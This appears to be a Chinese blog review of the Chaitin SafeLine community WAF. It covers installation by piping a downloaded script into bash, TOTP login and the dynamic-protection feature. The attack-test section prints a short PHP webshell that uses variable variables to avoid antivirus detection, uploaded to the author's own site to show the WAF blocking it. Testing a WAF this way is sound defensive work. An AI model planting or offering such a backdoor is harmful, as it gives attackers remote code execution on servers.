一、雷池简介(官方)
自 2016 年起,长亭就开源了雷池的语义分析算法自动机引擎,随后又陆续开源了雷池相关风控插件和引擎通信协议。雷池的商业版本自发布以来,得到了各大咨询机构和众多顶级企业的认可。然而,尽管雷池取得了显著的市场成功,但实际使用的头部企业数量仍然有限。只有少数群体真正体验过雷池的产品,这使得我们感到遗憾,因为智能语义分析算法并未能广泛普及。
为了让更多用户零成本地体验到语义分析算法的强大功能,2023年四月份,雷池在 GitHub 上发布了雷池的社区免费版本。希望通过这一举措,让更广大的开发者和企业能够受益于雷池的技术优势,共同推动智能语义分析算法的发展与应用。
二、在线安装雷池
1、安装命令
执行以下命令脚本会自动检测docker环境并完成安装
复制以下命令执行,即可完成安装
bash -c "$(curl -fsSLk https://waf-ce.chaitin.cn/release/latest/setup.sh)"
如果需要使用华为云加速,可使用
CDN=1 bash -c "$(curl -fsSLk https://waf-ce.chaitin.cn/release/latest/setup.sh)"
如果需要安装最新版本流式检测模式,可使用
STREAM=1 bash -c "$(curl -fsSLk https://waf-ce.chaitin.cn/release/latest/setup.sh)"2、登录流程
1.浏览器打开后台管理页面 https://<waf-ip>:9443。
2.输入初始的admin密码
完成安装后在shell会自动输出密码。
若忘记查看,需手动执行重置命令获得初始密码
docker exec safeline-mgt resetadmin
3.根据界面提示,使用 支持 TOTP 的认证软件或者小程序 扫描二维码,然后输入动态口令登录:
totp认证程序大家可以使用微软的Authenticator程序,支持同步
如果你不喜欢totp认证的话,在登陆后可以关闭。
TOTP 是什么?
TOTP是一种两步验证方法,通常用于提高账号的安全性。与静态密码不同,TOTP生成的密码是动态的,并且每隔一段时间(通常是30秒)会自动更新。这样,即使攻击者获得了临时密码,也无法在有效时间外使用。
TOTP 的工作原理
-
共享密钥(Secret Key):在设置TOTP时,用户和服务提供商之间会共享一个秘密密钥。这通常是一个随机生成的字符串,通过QR码或手动输入来完成共享。
-
时间同步:TOTP基于时间戳生成密码,因此用户设备和服务提供商的服务器需要时间同步。一般情况下,时间同步误差在几秒钟内不会影响验证。
-
生成动态密码:TOTP算法结合共享密钥和当前时间戳,通过哈希函数生成一个唯一的动态密码。这个密码通常是6到8位数字。
-
验证过程:
- 用户在登录时输入用户名和密码后,还需要输入TOTP生成的动态密码。
- 服务提供商使用同样的共享密钥和时间戳生成一个动态密码,并与用户输入的密码进行比对。
- 如果两个密码匹配,用户即可通过验证。
使用 TOTP 的应用
TOTP广泛应用于各类需要高安全性的场景,例如:
- 银行和金融服务:保护用户的网上银行账户。
- 企业系统:保障员工远程登录企业内网的安全。
- 社交媒体和电子邮件:防止账号被黑客入侵。
- 云服务和开发者平台:如GitHub、AWS等提供的双因素认证选项。
TOTP 的优势
- 高安全性:动态密码每隔一段时间更新一次,极大降低了密码被盗用的风险。
- 易于使用:只需在移动设备上安装一个TOTP生成器应用,如Google Authenticator或Authy。
- 离线工作:TOTP生成不需要网络连接,只需设备时间准确。
如何使用 TOTP
- 安装TOTP应用:在智能手机上安装TOTP生成器应用,如Google Authenticator、Authy或微软认证器。
- 设置TOTP:在需要双因素认证的服务中启用TOTP选项,扫描QR码或输入共享密钥。
- 登录时使用:每次登录时,在输入完静态密码后,打开TOTP应用生成动态密码,并输入到相应的验证框中。
通过这种方式,TOTP大大增强了账户的安全性,让用户能够更放心地进行在线操作。
三、体验动态防护
1、动态防护介绍
这是雷池在6.0的版本中新加入的功能。
长亭官方是这样介绍的:
动态防护功能是长亭雷池WAF的一次重要更新,旨在提供更加灵活和高效的安全防护。该功能通过实时监测和动态调整防护策略,实现对Web应用的全方位保护。
动态防护功能的主要特点包括:
实时监测:动态防护功能能够实时监测网站中的HTML和JavaScript代码,并根据需要进行动态加密和混淆,从而有效阻止爬虫和攻击自动化利用程序。
动态加密和混淆:即使是静态页面,也会具有动态的随机性。这种技术可以将网页赋予动态特性,使得每次访问时,代码都会以不同的随机形态出现,从而增加了攻击者的难度。
保护前端代码的隐私性:通过动态加密保护,前端代码的隐私性得到增强,进一步提升了网站的安全性。
主动防御:动态防护不仅可以防护传统攻击行为,还可以有效防御传统手段无法应对的新兴威胁。
多维度立体化的综合防御系统:结合AI智能威胁检测技术,构建起多维度立体化的综合防御系统,高效应对各种安全威胁。
易于管理和部署:用户可以通过简单的操作开启和管理动态防护功能,确保网站的安全性。
[6.0.0] - 2024-05-31
- 站点高级防护新增动态防护(BETA),能自动动态加密网站的 html 和 js 源码,阻止爬虫和攻击自动化程序的分析(对应新增 safeline-chaos 容器)
2、添加防护网站
1、首先我们登录进入后,选择防护站点
2、点击添加站点
填入网站需要监听的域名端口,在上游服务器填入网站服务器内网地址。
3、配置动态防护的资源
1)从站点防护进入动态防护配置页,点击黄色禁用改为启用
2)添加防护资源、点击右下角添加需要保护的资源
3)防护前后对比
防护前:
防护后:
3、动态防护评价
从上面的对比中我们可以看到,在选中需要防护的资源后,页面会提示已经被waf保护了,这个时候我们可以看到,原来页面上的原始代码,已经变成了被混淆后的代码,安全性大大提高了。
长亭雷池WAF的动态防护功能在实际应用中具有显著的正面影响,不仅提升了企业的网络安全防护能力,还通过其灵活性、高性能和低延迟等特点,为企业带来了便捷和高效的网络安全解决方案。
四、攻击测试(我自己的网站,小朋友不要学啊)
1、构建攻击代码
我们构建一个变量传递多次的后门代码,这个代码正常情况下是不会报毒的,将他通过web上传到服务器,看看能不能被雷池检测到
<?php $username = $_POST['username']; $password = $_POST['password']; $shell = "username"; $variable = $password; @$$shell($variable); ?>2、上传测试
可以很明显看到,我们的上传文件操作出错了,打开请求一看,哦,是雷池。
3、后台检查
这里可以看到,系统提示我的网站正在遭受攻击,防护效果还是不错的。清楚的标明了攻击者的ip,被攻击的日志记录,还可以进行ai分析。
五、长亭大模型对攻击新型ai分析
非常的牛逼啊,建议大家试一试
七、相关地址
官网:雷池 WAF 社区版 | 下一代 Web 应用防火墙 | 免费使用 (chaitin.cn)
